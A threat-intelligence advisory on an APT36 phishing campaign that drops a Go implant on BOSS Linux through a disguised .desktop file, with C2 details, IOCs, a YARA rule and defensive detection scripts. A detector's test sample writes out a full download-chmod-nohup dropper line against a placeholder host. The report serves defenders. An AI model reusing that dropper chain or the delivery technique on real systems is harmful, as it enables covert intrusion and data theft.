Phishing Attack : Deploying Malware on Indian Defense BOSS Linux

Published On : 2025-07-04

Executive Summary

CYFIRMA has identified a sophisticated cyber-espionage campaign orchestrated by APT36 (also known as Transparent Tribe), a threat actor based in Pakistan. This campaign specifically targets personnel within the Indian defense sector. In a notable shift from previous methodologies, APT36 has adapted its tactics to focus on Linux-based environments, with a particular emphasis on systems running BOSS Linux, a distribution extensively utilized by Indian government agencies.

The attack vector involves the dissemination of phishing emails containing a ZIP file attachment that houses a malicious .desktop file, which serves as a Linux shortcut. Upon execution by the victim, the file triggers a dual-action mechanism: it downloads and opens a legitimate PowerPoint (.pptx) file to create a facade of authenticity and divert the user’s attention, while simultaneously downloading and executing a malicious ELF (Executable and Linkable Format) binary in the background. This ELF file acts as the primary payload, designed to compromise the host system and facilitate unauthorized access.

This multi-stage approach is intended to bypass user suspicion and evade traditional security measures, enabling threat actors to gain persistent access to sensitive environments. The deployment of Linux-specific malware signifies a noteworthy advancement in APT36’s operational capabilities and highlights the increasing risk posed to critical government and defense infrastructure.

Considering this development, organizations, particularly those operating within the public sector and utilizing Linux-based systems, are strongly advised to treat this threat as a matter of high priority and to implement robust cybersecurity controls and threat detection mechanisms to mitigate potential risks.

Introduction

In today’s complex cyber threat landscape, nation-state actors such as APT36, also known as Transparent Tribe, pose significant risks to national security. The group has consistently targeted India’s defense and government sectors through sophisticated cyber-espionage campaigns aimed at data theft and long-term access.

Recent developments show a shift in APT36’s tactics toward Linux-based platforms, particularly BOSS Linux, widely used by Indian government agencies. Using phishing emails with ZIP files containing malicious .desktop files, the group deploys a decoy PowerPoint while secretly installing a harmful ELF binary. This highlights the urgent need for stronger email security, user awareness, and continuous threat intelligence monitoring.

Target Technologies      BOSS Operating System
Threat Type              Phishing Campaign
Written In               Go
File Types               ELF (Executable and Linkable Format)
Key Malware Identifiers  Cyber-Security-Advisory.desktop, Cyber-Security-Advisory.ppt and BOSS.elf
Observed First           2025-06-07
Impact                   Data Exfiltration
MD5 Hashes               Cyber-Security-Advisory.desktop: 6eb04445cad300c2878e8fbd3cb60b52
                         BOSS.elf: 18cf1e3be0e95be666c11d1dbde4588e

Malware Campaign Attack Flow

In this campaign, the group distributes phishing emails carrying a ZIP archive named “Cyber-Security-Advisory.zip”.

When opened, it contains a .desktop file named “Cyber-Security-Advisory.desktop” (Linux shortcut file).

How the “.desktop” shortcut file works
A .desktop file is a freedesktop.org desktop-entry file; its Exec= line holds a sequence of shell commands that run in order when the entry is launched. Whether a double-click launches it at all depends on the file manager: GNOME Files, for example, refuses to run a .desktop file that is not marked executable or trusted, and a ZIP archive created on a Unix host can carry that executable bit through extraction.

“Type=Application” marks the entry as an application launcher, so the desktop executes its Exec line instead of opening the file as a document or link.

“Terminal=false” suppresses the terminal window that would otherwise show the commands and their output, so the chain runs silently.

“Icon=libreoffice-impress” gives the shortcut the LibreOffice Impress icon, completing its disguise as a presentation file.

The Exec line initiates a Bash shell using the bash -c command, allowing the execution of multiple commands in a single line.

The sequence begins by changing the working directory to /tmp, a temporary and universally writable location on the system.

The script uses the curl command to silently download a file named slide.pptx from an attacker-controlled server.

Although the filename suggests it is a legitimate PowerPoint presentation, it is in fact an HTML file containing an <iframe> element.

This iframe loads a seemingly legitimate blog page hosted on the same malicious domain.

When executed, the command [ -s slide.pptx ] checks whether the file exists and is not empty. If the condition is met, the file is opened in LibreOffice Impress in view-only mode. This decoy document serves as a distraction, giving the impression of authenticity and thereby lowering the victim’s suspicion.

While the victim is engaged with this harmless-looking presentation, the script continues its execution in the background. A second curl command is issued to silently download a malicious ELF (Executable and Linkable Format) binary named BOSS.elf, which is saved locally as client.elf.

Once downloaded, the script assigns executable permissions to the binary using the chmod +x command. Subsequently, it executes the binary using nohup, allowing it to run in the background even if the user logs out. All output and error messages are redirected to /dev/null, ensuring that no visible signs of execution are displayed to the user.

This carefully orchestrated sequence enables the attacker to deploy and execute malware without alerting the victim. By combining a visual decoy (the iframe-based HTML document) with covert execution of the payload (the ELF binary), the attacker leverages both social engineering and technical stealth. This multi-stage approach significantly increases the chances of a successful compromise, allowing the attacker to establish persistence on the target system and potentially carry out further espionage or data exfiltration operations without immediate detection.
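The launcher traits described above can be checked mechanically before a file reaches a user. The following triage scanner is an added example written for this page, not CYFIRMA's tooling: it parses a desktop-entry file and reports the silent bash -c wrapper behind an office icon, the download into /tmp, the [ -s file ] gate on the decoy, and the chmod +x / nohup handling of the payload. Both sample launchers are constructed for the example and use a placeholder host, not the campaign's infrastructure.

```python
"""Triage scanner for .desktop launchers that use the decoy-plus-dropper pattern.

Added example (not CYFIRMA's code). Samples are constructed; the host is a placeholder.
"""
import os
import re
from configparser import ConfigParser

SHELLS = {"bash", "sh", "dash", "zsh"}
OFFICE_LAUNCHERS = {"libreoffice", "soffice", "loimpress", "lowriter", "localc"}
URL_RE = re.compile(r"https?://[^\s\"';|&)]+")

# Constructed launcher mirroring the described chain (placeholder host, not the real infrastructure).
SAMPLE_MALICIOUS = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory
Terminal=false
Icon=libreoffice-impress
Exec=bash -c "cd /tmp; curl -s -o slide.pptx https://decoy.example.invalid/slide.pptx; [ -s slide.pptx ] && libreoffice --view slide.pptx & curl -s -o client.elf https://decoy.example.invalid/BOSS.elf; chmod +x client.elf; nohup ./client.elf >/dev/null 2>&1 &"
"""

# Constructed benign launcher of the kind a distribution ships.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=LibreOffice Impress
Terminal=false
Icon=libreoffice-impress
Exec=libreoffice --impress %U
"""


def parse_desktop(text):
    """Return the [Desktop Entry] keys as a dict, preserving key case and literal values."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep "Exec", "Icon" as written
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def scan_desktop_text(text):
    """Collect the dropper traits present in one launcher."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    icon = entry.get("Icon", "").lower()
    terminal = entry.get("Terminal", "false").strip().lower() == "true"
    tokens = exec_line.split()
    program = os.path.basename(tokens[0]) if tokens else ""
    findings = []

    if program in SHELLS and len(tokens) > 1 and tokens[1] == "-c":
        findings.append("shell_wrapper")          # Exec=bash -c "..." instead of a program
        if not terminal:
            findings.append("silent_shell")       # Terminal=false hides the shell's output
    if icon.startswith("libreoffice") and program not in OFFICE_LAUNCHERS:
        findings.append("office_icon_mismatch")   # office icon, but Exec starts something else

    patterns = {
        "downloader": r"\b(curl|wget)\b",
        "tmp_workdir": r"\bcd\s+/tmp\b|/tmp/",
        "existence_gate": r"\[\s*-s\s+\S+\s*\]",  # [ -s file ] before opening the decoy
        "chmod_exec": r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b",
        "background_exec": r"\bnohup\b|>\s*/dev/null\s+2>&1\s*&",
    }
    for name, pat in patterns.items():
        if re.search(pat, exec_line):
            findings.append(name)
    return {"findings": findings, "urls": URL_RE.findall(exec_line), "name": entry.get("Name", "")}


def is_suspicious(result):
    """Verdict: a download that is then made executable or backgrounded, or a shell hidden behind an office icon."""
    f = set(result["findings"])
    return bool(("downloader" in f and f & {"chmod_exec", "background_exec"})
                or {"shell_wrapper", "office_icon_mismatch"} <= f)


if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        r = scan_desktop_text(sample)
        print(label, is_suspicious(r), r["findings"], r["urls"])
```

Run it over every .desktop file extracted from mail attachments or found under user-writable paths (~/Downloads, /tmp); a hit is a triage lead, and the extracted URLs can be fed straight to the proxy block-list.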

Domain Analysis
Based on recent threat intelligence and security research, the domain sorlastore.com has been identified as malicious infrastructure actively used in cyber-espionage campaigns attributed to the APT36 (Transparent Tribe) threat group. This domain, along with several associated subdomains, has been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector.

The domain sorlastore.com has also been associated with campaigns targeting Windows-based environments, wherein malicious macro-embedded PPAM (PowerPoint Add-in) files are employed.

These campaigns use tactics similar to those observed in the Linux-based attacks: phishing emails deliver PPAM files crafted to resemble legitimate cybersecurity or defense-related advisories, and on execution the embedded macros connect to domains linked to APT36 infrastructure, including sorlastore.com and its subdomains, to download and execute additional payloads.

Technical Analysis of “client.elf”

Static Analysis

Execution
The binary client.elf can run either silently in the background, which is how the .desktop launcher starts it through nohup, or interactively in a visible terminal when launched by hand. This flexibility lets the operator run the implant covertly on a victim or observe its behavior directly during testing.

Reconnaissance
The malware gathers system hostname, CPU, and RAM details to profile the victim’s machine and tailor its malicious actions.

The malware gathers system information by checking the runlevel and inspecting the status of the CUPS service using systemctl. It also lists startup scripts to identify services that could be leveraged for persistence or lateral movement.

Evasion
The function named main.junkcalc2 is, despite its name, the malware’s logging routine: it records commands received and sent, connection attempts, successful connections and retries, and handles both byte and string data. That log gives the operator a running picture of the implant’s state and makes command and control easier to manage. The misleading symbol name, which suggests filler code, is meant to keep the logging and networking logic from standing out to analysts and to signature tooling that scans Go symbol names.

Data Discovery
It uses main.getDrives to enumerate mounted drives and Go’s os.ReadDir to walk their contents, which lets it locate files for later exfiltration.

Command and Control
The malware leverages main.loadConfig to retrieve operational settings, including C2 server details (101.99.92[.]182:12520).

main.connectToServer is used to establish a TCP remote connection on port 12520, enabling command execution and data exfiltration.

The session is kept alive with SetKeepAlive and SetKeepAlivePeriod, which enable TCP keep-alive probes on a 30-second period, so a dead connection is noticed promptly; the client then reconnects, retrying at the same interval until the server answers, which gives the attacker continuous access.

Collection
The malware leverages the Go-based library “github.com/kbinani/screenshot” to capture images of the victim’s desktop, supporting multiple display configurations. This capability enables the attacker to covertly collect visual information from the compromised system without alerting the user.

Data Exfiltration
For each event, such as startScreenCapture, listDrives, SearchFilesAndSendResults, SendFiles, ExecuteCommand, and sendError, the main.sendResponse function is invoked with appropriate parameters to transmit data to the attacker’s server. This function is capable of handling both string and byte data types, enabling it to perform file-related operations and facilitate communication effectively.

Dynamic Analysis

On execution, the sample loads its configuration and attempts a TCP connection to 101.99.92[.]182 on port 12520. At the time of analysis the server was unreachable, so no command traffic could be captured; the implant nevertheless keeps retrying, and the threat actor can bring the C2 server back at any time to obtain full remote control of an infected host.
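The C2 behavior described above (a fixed socket, keep-alive with a 30-second period, retries while the server is down) is what a network hunt should key on. The following is an added example written for this page, not CYFIRMA's tooling: it reads Zeek conn.log records, matches flows to the IOC socket 101.99.92[.]182:12520, and flags source hosts whose attempts recur on a fixed period. The log lines are constructed for the example and trimmed to the columns used; a real conn.log carries more fields.

```python
"""Hunt for the client.elf C2 channel in Zeek conn.log records.

Added example (not CYFIRMA's code). Log lines are constructed and trimmed.
conn_state S0 means a SYN was sent and nothing came back, which is what an
unreachable C2 server looks like from the victim's side.
"""
import statistics

IOC_IP, IOC_PORT = "101.99.92.182", 12520
FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto", "conn_state"]

# Constructed conn.log excerpt: host .40 retries the C2 every ~30 s; host .41 is ordinary HTTPS.
SAMPLE_CONN_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tconn_state
1751600000.10\tCa1\t10.20.30.40\t51000\t101.99.92.182\t12520\ttcp\tS0
1751600007.40\tCb2\t10.20.30.41\t44210\t10.0.0.5\t443\ttcp\tSF
1751600030.12\tCa3\t10.20.30.40\t51001\t101.99.92.182\t12520\ttcp\tS0
1751600059.98\tCa4\t10.20.30.40\t51002\t101.99.92.182\t12520\ttcp\tS0
1751600071.00\tCb5\t10.20.30.41\t44211\t10.0.0.5\t443\ttcp\tSF
1751600090.05\tCa6\t10.20.30.40\t51003\t101.99.92.182\t12520\ttcp\tS0
1751600120.09\tCa7\t10.20.30.40\t51004\t101.99.92.182\t12520\ttcp\tS0
"""


def parse_conn_log(text):
    """Parse tab-separated conn.log lines into dicts, skipping Zeek header lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(FIELDS, line.split("\t")))
        rec["ts"] = float(rec["ts"])
        rec["id.resp_p"] = int(rec["id.resp_p"])
        records.append(rec)
    return records


def is_periodic(timestamps, period=30.0, tolerance=0.2):
    """True when at least three attempts are spaced period +/- tolerance apart (beacon/retry loop)."""
    if len(timestamps) < 3:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    slack = period * tolerance
    return (abs(statistics.median(gaps) - period) <= slack
            and max(abs(g - period) for g in gaps) <= slack)


def hunt(text, ioc_ip=IOC_IP, ioc_port=IOC_PORT):
    """Per source host: attempts to the IOC socket, their connection states, and whether they recur periodically."""
    per_host = {}
    for rec in sorted(parse_conn_log(text), key=lambda r: r["ts"]):
        if rec["id.resp_h"] != ioc_ip or rec["id.resp_p"] != ioc_port:
            continue
        h = per_host.setdefault(rec["id.orig_h"], {"timestamps": [], "states": set()})
        h["timestamps"].append(rec["ts"])
        h["states"].add(rec["conn_state"])
    return {host: {"attempts": len(h["timestamps"]),
                   "states": sorted(h["states"]),
                   "periodic": is_periodic(h["timestamps"])}
            for host, h in per_host.items()}


if __name__ == "__main__":
    for host, summary in hunt(SAMPLE_CONN_LOG).items():
        print(host, summary)
```

A host whose attempts are all S0 is still infected: the implant is running and will succeed the moment the server is back, so the host is isolated on the first hit, not on the first successful session. The same period check works for any fixed-interval beacon once the IOC socket changes.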

MITRE ATT&CK Framework

MITRE MAPPING
Tactic                 ID          Technique Name
Initial Access         T1566       Phishing
                       T1566.001   Spearphishing Attachment
Execution              T1059.004   Command and Scripting Interpreter: Unix Shell
Persistence            T1543       Create or Modify System Process
                       T1543.002   Systemd Service
Privilege Escalation   T1543       Create or Modify System Process
                       T1543.002   Systemd Service
Defense Evasion        T1036       Masquerading
                       T1564       Hide Artifacts
                       T1564.001   Hidden Files and Directories
Discovery              T1518       Software Discovery
                       T1518.001   Security Software Discovery
Command and Control    T1071       Application Layer Protocol
                       T1095       Non-Application Layer Protocol
                       T1105       Ingress Tool Transfer
                       T1571       Non-Standard Port

Note on the mapping: T1064 Scripting is deprecated in ATT&CK and was merged into T1059, so the launcher’s bash -c chain is mapped to T1059.004 Unix Shell; and the Systemd Service sub-technique is T1543.002 (T1543.003 is Windows Service).

Conclusion

APT36’s latest campaign showcases a significant advancement in Linux-targeted malware delivery by combining phishing, social engineering, and stealthy payload execution. Government, defense, and critical infrastructure organizations using BOSS Linux or other Linux-based platforms should treat this threat as a high-priority concern. Implementing layered security measures spanning technical controls, user education, and continuous monitoring is essential to mitigate the risk of compromise and to defend against future, increasingly sophisticated campaigns.

Recommendations and Mitigation

Based on the comprehensive analysis of the APT36 campaign targeting Indian defense personnel through phishing emails and disguised malware, CYFIRMA recommends the following mitigation strategies, specifically tailored for the Indian defense sector:

1. Email Security Enhancements

  • Implement advanced email filtering to detect and block phishing attempts, especially those containing .desktop files, ZIP archives, and executable content.
  • Disable execution of email attachments by default, unless explicitly verified.
  • Use sandboxing to automatically detonate and analyze attachments in a controlled environment before delivery to users.

2. User Awareness and Training

  • Conduct regular cybersecurity awareness training focused on phishing tactics, social engineering, and suspicious file types (e.g., .desktop, .elf, .pptx from unknown sources).
  • Encourage a zero-trust mindset, where users are trained not to open unsolicited attachments or click on unknown links, especially in government and defense environments.

3. System Hardening

  • Mount /tmp, /var/tmp and /dev/shm with noexec,nosuid,nodev so a binary dropped there, such as client.elf, cannot be executed directly. Note that noexec does not stop scripts handed to an interpreter or payloads run from memory (memfd_create), so it complements rather than replaces allow-listing.
  • Configure file managers and mail clients not to launch .desktop files from user-writable locations such as Downloads or extracted archives; desktops that already refuse untrusted launchers (GNOME Files, for example) should be left that way rather than having users taught to mark files as trusted.
  • Implement application allow-listing so that unknown ELF binaries, such as client.elf, cannot run regardless of where they are written.

4. Network and Endpoint Monitoring

  • Deploy EDR (Endpoint Detection and Response) tools capable of detecting Linux threats, unauthorized process execution, and unusual network behavior.
  • Monitor outbound traffic for unusual or unauthorized connections to suspicious domains and sockets (e.g., sorlastore[.]com and 101.99.92[.]182:12520) that may indicate malware beaconing or payload delivery.
  • Use network segmentation to limit the spread of malware within critical systems and infrastructure.

5. Threat Intelligence Integration

  • Incorporate threat intelligence feeds into your SIEM or detection systems to flag known Indicators of Compromise (IOCs), such as:
      - Malicious files: Cyber-Security-Advisory.desktop (MD5 6eb04445cad300c2878e8fbd3cb60b52) and BOSS.elf (MD5 18cf1e3be0e95be666c11d1dbde4588e)
      - Malicious domain: govin.sorlastore[.]com
  • Hunt for known APT36 TTPs (Tactics, Techniques, and Procedures) using the MITRE ATT&CK mapping above to identify related activity.

6. System and Application Patching

  • Ensure BOSS Linux systems and all open-source applications (like LibreOffice, curl, etc.) are up to date with the latest security patches to reduce exploitation vectors.

7. File and Process Behavior Controls

  • Use behavior-based detection rules to flag suspicious use of tools like curl, chmod, and nohup, especially when chained together in scripts or .desktop files.
  • Block execution of unknown binaries downloaded via scripts unless verified and signed by the organization.
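A behavior rule for the curl, chmod, nohup chain is more robust than a rule on any one of those commands, each of which is common on its own. The following is an added example written for this page, not CYFIRMA's tooling: it walks process-execution events, tracks files written by curl or wget per login session, and alerts only when such a file is made executable and then launched within a short window. The events are a constructed, simplified form of what auditd (type=EXECVE) or an eBPF exec tracer records; session 7 replays the launcher's chain with a placeholder host, session 9 is an ordinary developer download that must not alert.

```python
"""Detect the download -> chmod +x -> launch chain in process-execution telemetry.

Added example (not CYFIRMA's code). Events are constructed; the host is a placeholder.
"""
import os
from collections import defaultdict

DOWNLOADERS = {"curl", "wget"}
LAUNCH_WRAPPERS = {"nohup", "setsid"}
WINDOW_SECONDS = 120  # download, chmod and launch must all fall inside this window

SAMPLE_EVENTS = [  # constructed; ts = epoch seconds, ses = login session id
    {"ts": 1000.0, "ses": 7, "argv": ["curl", "-s", "-o", "slide.pptx", "https://decoy.example.invalid/slide.pptx"]},
    {"ts": 1001.0, "ses": 7, "argv": ["libreoffice", "--view", "slide.pptx"]},
    {"ts": 1001.5, "ses": 7, "argv": ["curl", "-s", "-o", "client.elf", "https://decoy.example.invalid/BOSS.elf"]},
    {"ts": 1002.0, "ses": 7, "argv": ["chmod", "+x", "client.elf"]},
    {"ts": 1002.1, "ses": 7, "argv": ["nohup", "./client.elf"]},
    {"ts": 2000.0, "ses": 9, "argv": ["curl", "-LO", "https://mirror.example.invalid/tool.tar.gz"]},
    {"ts": 2005.0, "ses": 9, "argv": ["tar", "xf", "tool.tar.gz"]},
    {"ts": 2010.0, "ses": 9, "argv": ["chmod", "+x", "tool/run.sh"]},
    {"ts": 2011.0, "ses": 9, "argv": ["tool/run.sh"]},
]


def downloaded_name(argv):
    """Local file name a curl/wget command line writes, or None if it is not a download."""
    tool = os.path.basename(argv[0])
    if tool not in DOWNLOADERS:
        return None
    for i in range(1, len(argv) - 1):  # explicit output file
        if (tool == "curl" and argv[i] in ("-o", "--output")) or \
           (tool == "wget" and argv[i] in ("-O", "--output-document")):
            return os.path.basename(argv[i + 1])
    urls = [a for a in argv[1:] if a.startswith(("http://", "https://"))]
    # wget keeps the remote name by default; curl does so with -O (also combined, e.g. -LO)
    keeps_remote_name = tool == "wget" or any(
        a.startswith("-") and not a.startswith("--") and "O" in a for a in argv[1:])
    if urls and keeps_remote_name:
        return os.path.basename(urls[-1].split("?")[0])
    return None


def adds_exec_bit(mode):
    """True for chmod modes such as +x, u+x, a+rx, 755, 0755."""
    if "x" in mode and ("+" in mode or "=" in mode):
        return True
    return mode.isdigit() and any(int(d) & 1 for d in mode[-3:])


def detect_chains(events, window=WINDOW_SECONDS):
    """Return one alert per downloaded file that is made executable and then launched in the same session."""
    alerts = []
    tracked = defaultdict(dict)  # session -> basename -> {"download": ts, "chmod": ts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        argv, ses, ts = ev["argv"], ev["ses"], ev["ts"]
        if not argv:
            continue
        tool = os.path.basename(argv[0])
        name = downloaded_name(argv)
        if name:
            tracked[ses][name] = {"download": ts}
            continue
        if tool == "chmod" and len(argv) >= 3 and adds_exec_bit(argv[1]):
            for path in argv[2:]:
                rec = tracked[ses].get(os.path.basename(path))
                if rec and ts - rec["download"] <= window:
                    rec["chmod"] = ts
            continue
        target = argv[1] if tool in LAUNCH_WRAPPERS and len(argv) > 1 else argv[0]
        key = os.path.basename(target)
        rec = tracked[ses].get(key)
        if rec and "chmod" in rec and ts - rec["download"] <= window:
            alerts.append({"ses": ses, "file": key, "download_ts": rec["download"],
                           "chmod_ts": rec["chmod"], "exec_ts": ts, "wrapped": tool in LAUNCH_WRAPPERS})
            del tracked[ses][key]  # report each chain once
    return alerts


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

Keying on the session rather than the parent PID matters here: the launcher's bash -c forks each command separately, so curl, chmod and nohup are siblings, not a parent-child chain. The same logic applies to wget and to numeric chmod modes, and the window keeps a file downloaded yesterday and run today from alerting.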

Maintain alignment with CYFIRMA’s threat intelligence sharing platform to proactively detect emerging Tactics, Techniques, and Procedures (TTPs), improve situational awareness, and facilitate timely mitigation of threats specific to your sector and geographic region.

Utilize YARA rules and Indicators of Compromise (IOCs) provided by CYFIRMA to strengthen the detection of malicious files and anomalous behavior. Integrate and regularly update these indicators within your Security Information and Event Management (SIEM) platform to support effective file integrity monitoring and behavioral analysis.

Indicators of Compromise

Kindly refer to the IOCs section, applying relevant security controls.

S. No.  Indicator                                                               Remarks
1       608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a        Block
2       ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab        Block
3       e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064        Block
4       167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f        Block
5       https://govin.sorlastore[.]com/uploads/Cyber-Security-Advisory.pptx     Block
6       https://govin.sorlastore[.]com/uploads/BOSS.elf                         Block
7       sorlastore[.]com                                                        Block
8       http://169.254.169[.]254/latest/meta-data/ami-id                        Monitor
9       169.254.169[.]254                                                       Monitor
10      101.99.92[.]182                                                         Monitor
11      modgovin.onthewifi[.]com                                                Monitor

169.254.169[.]254 is the link-local cloud instance-metadata address (the listed path is the AWS metadata endpoint for the AMI ID). Cloud agents and SDKs query it legitimately, which is why it is marked Monitor rather than Block; an on-premises BOSS desktop, however, has no reason to contact it, and a request to it from such a host is worth investigating.

YARA Rules

import "hash"

rule APT36_Sorlastore_PPAM_and_ELF
{
    meta:
        description = "Detects APT36 campaign artifacts: slide.pptx, BOSS.elf, govin.sorlastore domain activity"
        author = "CYFIRMA Researcher"
        date = "2025-07-03"
        threat_actor = "APT36 / Transparent Tribe"

    strings:
        // Infrastructure strings as they appear inside the .desktop launcher, the HTML decoy or the ELF
        $dom1 = "sorlastore.com" ascii wide
        $dom2 = "onthewifi.com" ascii wide
        $ip1  = "101.99.92.182" ascii wide
        // Cloud metadata address: also present in much legitimate software, hence "Monitor" in the IOC table
        $ip2  = "169.254.169.254" ascii wide

    condition:
        // A file never contains its own SHA256 as text, so the hashes are compared against the scanned file's digest
        hash.sha256(0, filesize) == "608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a" or
        hash.sha256(0, filesize) == "ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab" or
        hash.sha256(0, filesize) == "e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064" or
        hash.sha256(0, filesize) == "167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f" or
        any of ($dom*) or
        any of ($ip*)
}

The hash comparisons use YARA’s hash module rather than string patterns, because a sample does not contain its own digest; a string-based hash rule never fires. The string matches are weaker signals: $ip2 in particular appears in many legitimate cloud agents and SDKs, so a hit on it alone is a triage lead, not a verdict.